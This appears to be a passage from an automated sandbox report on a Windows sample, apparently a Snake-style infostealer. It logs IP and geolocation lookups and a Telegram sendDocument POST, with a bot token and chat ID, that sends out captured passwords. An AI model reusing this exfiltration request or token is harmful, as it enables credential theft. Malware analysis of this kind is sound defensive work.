                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49713 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49722 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5190d8bacacdHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002D05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003081000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Customer Request.exe, 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: Customer Request.exe, gCFuOglEso.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: Customer Request.exe, gCFuOglEso.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: Customer Request.exe, gCFuOglEso.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: Customer Request.exe, 00000000.00000002.1487696864.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2710969497.0000000003081000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000B.00000002.1520510912.0000000002521000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Customer Request.exe, gCFuOglEso.exe.0.drString found in binary or memory: http://tempuri.org/DataTableUsers.xsd
                  Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2710969497.0000000003125000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002D05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org0
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Customer Request.exe, 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2710969497.0000000003081000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: Customer Request.exe, gCFuOglEso.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
